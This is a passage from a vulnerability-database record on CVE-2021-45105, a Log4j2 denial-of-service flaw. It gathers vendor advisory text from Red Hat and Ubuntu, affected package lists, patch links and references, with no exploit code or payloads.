"VULHUB", id: "VHN-408743", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2021-45105", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apache Log4j. Authentication is not required to exploit this vulnerability.The specific flaw exists within the StrSubstitutor class. The issue results from the lack of proper validation of user-supplied data, which can result in a resource exhaustion condition. An attacker can leverage this vulnerability to create a denial-of-service condition on the process. Log4j is an open source project of Apache. By using Log4j, the destination of log information transmission can be controlled to be console, file, GUI component, even socket server, NT event recorder, etc. Apache Log4j2 has a denial of service vulnerability. This vulnerability is due to the fact that Apache Log4j2 is configured with a non-default Pattern Layout scenario with Context Lookup (for example: $${ctx:loginId}), attackers can use this vulnerability to construct malicious data and execute denial of service without authorization attack, eventually causing the server to denial of service. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update\nAdvisory ID: RHSA-2022:1297-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1297\nIssue date: 2022-04-11\nCVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046 \n CVE-2021-45105 CVE-2022-23302 CVE-2022-23305 \n CVE-2022-23307 \n=====================================================================\n\n1. Summary:\n\nA security update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.4 for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.4.4 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* log4j: SQL injection in Log4j 1.x when application is configured to use\nJDBCAppender (CVE-2022-23305)\n\n* log4j: Unsafe deserialization flaw in Chainsaw log viewer\n(CVE-2022-23307)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured\nto use JMSAppender (CVE-2021-4104)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and\ncontext lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data\ncontains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured\nto use JMSSink (CVE-2022-23302)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender\n2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)\n2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern\n2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender\n2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink\n2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender\n2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7\nJBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1\nJBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034\nJBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17)\nJBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console\nJBEAP-22839 - [GSS](7.4.z) Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001\nJBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001\nJBEAP-22900 - Tracker bug for the EAP 7.4.4 release for RHEL-8\nJBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002\nJBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001\nJBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001\nJBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001\nJBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002\nJBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final\nJBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final\nJBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001\nJBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final\nJBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001\nJBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26\nJBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001\nJBEAP-23323 - [GSS](7.4.z) WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend\nJBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\nJBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001\nJBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\n\n7. Package List:\n\nRed Hat JBoss EAP 7.4 for RHEL 8:\n\nSource:\neap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.src.rpm\neap7-ecj-3.26.0-1.redhat_00002.1.el8eap.src.rpm\neap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.src.rpm\neap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.src.rpm\neap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-log4j-2.17.1-1.redhat_00001.1.el8eap.src.rpm\neap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.src.rpm\neap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.src.rpm\neap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.src.rpm\neap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.src.rpm\neap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.src.rpm\neap7-xom-1.3.7-1.redhat_00001.1.el8eap.src.rpm\neap7-yasson-1.0.10-1.redhat_00001.1.el8eap.src.rpm\n\nnoarch:\neap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-cli-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-commons-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-core-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-dto-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-hornetq-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-hqclient-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jdbc-store-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jms-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jms-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-journal-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-ra-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-selector-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-service-extensions-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-tools-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-ecj-3.26.0-1.redhat_00002.1.el8eap.noarch.rpm\neap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-core-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-entitymanager-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-envers-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-java8-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-cachestore-jdbc-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-cachestore-remote-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-client-hotrod-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-component-annotations-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-core-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-spi-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-v53-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-server-migration-cli-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-server-migration-core-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-log4j-2.17.1-1.redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-compensations-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jbosstxbridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jbossxts-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jts-idlj-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jts-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-api-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-bridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-util-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-txframework-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.noarch.rpm\neap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-elytron-tool-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-javadocs-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-modules-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-openssl-java-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-xom-1.3.7-1.redhat_00001.1.el8eap.noarch.rpm\neap7-yasson-1.0.10-1.redhat_00001.1.el8eap.noarch.rpm\n\nx86_64:\neap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm\neap7-wildfly-openssl-el8-x86_64-debuginfo-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-4104\nhttps://access.redhat.com/security/cve/CVE-2021-44832\nhttps://access.redhat.com/security/cve/CVE-2021-45046\nhttps://access.redhat.com/security/cve/CVE-2021-45105\nhttps://access.redhat.com/security/cve/CVE-2022-23302\nhttps://access.redhat.com/security/cve/CVE-2022-23305\nhttps://access.redhat.com/security/cve/CVE-2022-23307\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYlRUqtzjgjWX9erEAQhXfxAApQ6HkBUo8Tg+GWEosSpAx0AEsVPMojWK\nHU3uJRF8jp0KXqchc+KVlalBJAWHPBUDr4xBpsISqwr7T/9iYonKlo4ijA/68b2K\nkhbFyt6o6i2dXrYygT5fcMtukSjN2T/hfCc2ZE2yiHTO3Ou4AALyZ2xCyYtfSpuZ\nrZLVvgCWrnak2msgkoNl0/sZxnjw6b+ZJczKkq3QqPVWOYlV/Qdl5NGy16i0rbEo\nP1rWXJrOUlEBctJEs756cqeIJesYKHZqqPx/kHaNyzdxDh99hKGZx7oturscAN6e\nsPfSSdyd5jsOcWD7UlHV9ukoPQxf1ouVBa0qkpL0wCoR3GFF6Pls1bMEFzUoz3/R\nIwagVxsr38duK3isv34l6IQ+RP0oSWN0rgPUu69tAlEV+YwLgA5JUOpz1i7FTmXt\nl3i5+wMlo9Xc/Hy+j7unW8Do7s/i0YuFVTuM6H9KEITuFjgFA2tB9CpzoAFzWLk0\nU8zCL80Rwy1wiMydSrLjtg3YUPB6ibh2NJ02O7R+bNhJ8bN4yuDuWkDqy4VdPXGp\nzhed3dZmYAXD9/x+mnfghcbJZwigzGT9Qv78zYafB3f8K7cEVEDJK3aZMOkkh9ca\ndcaLs5WRv8ZTytFPv+KGKRJ/cc/UHAvh8zumMZdVMp1oty/k/OYWhgaEJMWGQDCe\nUnHI/WwB37w=\n=eCh2\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. =========================================================================\nUbuntu Security Notice USN-5222-1\nJanuary 11, 2022\n\napache-log4j2 vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.10\n- Ubuntu 21.04\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Apache Log4j 2. This issue only affected Ubuntu 18.04 LTS. \n(CVE-2021-45105)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.10:\n liblog4j2-java 2.17.1-0.21.10.1\n\nUbuntu 21.04:\n liblog4j2-java 2.17.1-0.21.04.1\n\nUbuntu 20.04 LTS:\n liblog4j2-java 2.17.1-0.20.04.1\n\nUbuntu 18.04 LTS:\n liblog4j2-java 2.12.4-0ubuntu0.1\n\nIn general, a standard system update will make all the necessary changes. Solution:\n\nFor OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html\n\n4", sources: [ { db: "NVD", id: "CVE-2021-45105", }, { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, ], trust: 2.25, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2021-45105", trust: 2.5, }, { db: "ZDI", id: "ZDI-21-1541", trust: 1.8, }, { db: "CERT/CC", id: "VU#930724", trust: 1.1, }, { db: "SIEMENS", id: "SSA-501673", trust: 1.1, }, { db: "SIEMENS", id: "SSA-479842", trust: 1.1, }, { db: "OPENWALL", id: "OSS-SECURITY/2021/12/19/1", trust: 1.1, }, { db: "ZDI_CAN", id: "ZDI-CAN-16160", trust: 0.7, }, { db: "PACKETSTORM", id: "165516", trust: 0.2, }, { db: "PACKETSTORM", id: "165552", trust: 0.2, }, { db: "PACKETSTORM", id: "165636", trust: 0.2, }, { db: "PACKETSTORM", id: "165637", trust: 0.1, }, { db: "PACKETSTORM", id: "165503", trust: 0.1, }, { db: "PACKETSTORM", id: "165373", trust: 0.1, }, { db: "PACKETSTORM", id: "165499", trust: 0.1, }, { db: "PACKETSTORM", id: "165649", trust: 0.1, }, { db: "PACKETSTORM", id: "165497", trust: 0.1, }, { db: "PACKETSTORM", id: "165494", trust: 0.1, }, { db: "PACKETSTORM", id: "165650", trust: 0.1, }, { db: "PACKETSTORM", id: "165648", trust: 0.1, }, { db: "PACKETSTORM", id: "165645", trust: 0.1, }, { db: "PACKETSTORM", id: "165632", trust: 0.1, }, { db: "CNVD", id: "CNVD-2021-101661", trust: 0.1, }, { db: "VULHUB", id: "VHN-408743", trust: 0.1, }, { db: "VULMON", id: "CVE-2021-45105", trust: 0.1, }, { db: "PACKETSTORM", id: "166676", trust: 0.1, }, { db: "PACKETSTORM", id: "166677", trust: 0.1, }, { db: "PACKETSTORM", id: "166798", trust: 0.1, }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, id: "VAR-202112-1782", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-408743", }, ], trust: 0.01, }, last_update_date: "2024-11-29T20:17:43.970000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Apache has issued an update to correct this vulnerability.", trust: 0.7, url: "https://logging.apache.org/log4j/2.x/security.html", }, { title: "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update on RHEL 7", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221462 - Security Advisory", }, { title: "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2021-45105: Certain strings can cause infinite recursion", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=9cdbf0a2dc2003562c697ebd1bd08570", }, { title: "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221469 - Security Advisory", }, { title: "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update on RHEL 8", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221463 - Security Advisory", }, { title: "Debian Security Advisories: DSA-5024-1 apache-log4j2 -- security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories&qid=affead52a755f931c66032144a27568d", }, { title: "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221299 - Security Advisory", }, { title: "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221296 - Security Advisory", }, { title: "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221297 - Security Advisory", }, { title: "Amazon Linux 2: ALAS2-2021-1733", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2&qid=ALAS2-2021-1733", }, { title: "IBM: Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization – Apache Log4j – [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15)", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=1239b8de81ba381055ce95c571a45bea", }, { title: "IBM: Security Bulletin: Hortonworks DataFlow product has log messages vulnerable to arbitrary code execution, denial of service, and remote code execution due to Apache Log4j vulnerabilities [CVE-2021-44228], [CVE-2021-45105], and [CVE-2021-45046]", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=7803153fe3afe7b4246685257610b110", }, { title: "IBM: An update on the Apache Log4j 2.x vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=0648a3f00f067d373b069c4f2acd5db4", }, { title: "Siemens Security Advisories: Siemens Security Advisory", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories&qid=1b15bf8c16ace8f01272aa507f950804", }, { title: "Amazon Linux 2022: ALAS2022-2021-008", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022&qid=ALAS2022-2021-008", }, { title: "Cisco: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-apache-log4j-qRuKNEbd", }, { title: "Citrix Security Bulletins: Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins&qid=f1a2b6f4f4568786daf1fc5e893e9283", }, { title: "Siemens Security Advisories: Siemens Security Advisory", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories&qid=6aac0ed5554d7c299f07f7ce8ad8be79", }, { title: "Siemens Security Advisories: Siemens Security Advisory", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories&qid=42e3d15623cd7650d7ccb17534ee39a8", }, { title: "CVE-2021-45105", trust: 0.1, url: "https://github.com/tejas-nagchandi/CVE-2021-45105 ", }, { title: "log4j2_dos_exploit", trust: 0.1, url: "https://github.com/iAmSOScArEd/log4j2_dos_exploit ", }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULMON", id: "CVE-2021-45105", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1.1, }, { problemtype: "CWE-674", trust: 1.1, }, ], sources: [ { db: "VULHUB", id: "VHN-408743", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 1.8, url: "https://logging.apache.org/log4j/2.x/security.html", }, { trust: 1.1, url: "https://www.kb.cert.org/vuls/id/930724", }, { trust: 1.1, url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-log4j-qruknebd", }, { trust: 1.1, url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { trust: 1.1, url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { trust: 1.1, url: "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0032", }, { trust: 1.1, url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { trust: 1.1, url: "https://www.debian.org/security/2021/dsa-5024", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { trust: 1.1, url: "https://www.zerodayinitiative.com/advisories/zdi-21-1541/", }, { trust: 1.1, url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2021-45105", }, { trust: 0.5, url: "https://access.redhat.com/security/updates/classification/#low", }, { trust: 0.5, url: "https://listman.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2021-45105", }, { trust: 0.5, url: "https://bugzilla.redhat.com/):", }, { trust: 0.5, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.4, url: "https://nvd.nist.gov/vuln/detail/cve-2021-44832", }, { trust: 0.3, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/", }, { trust: 0.3, url: 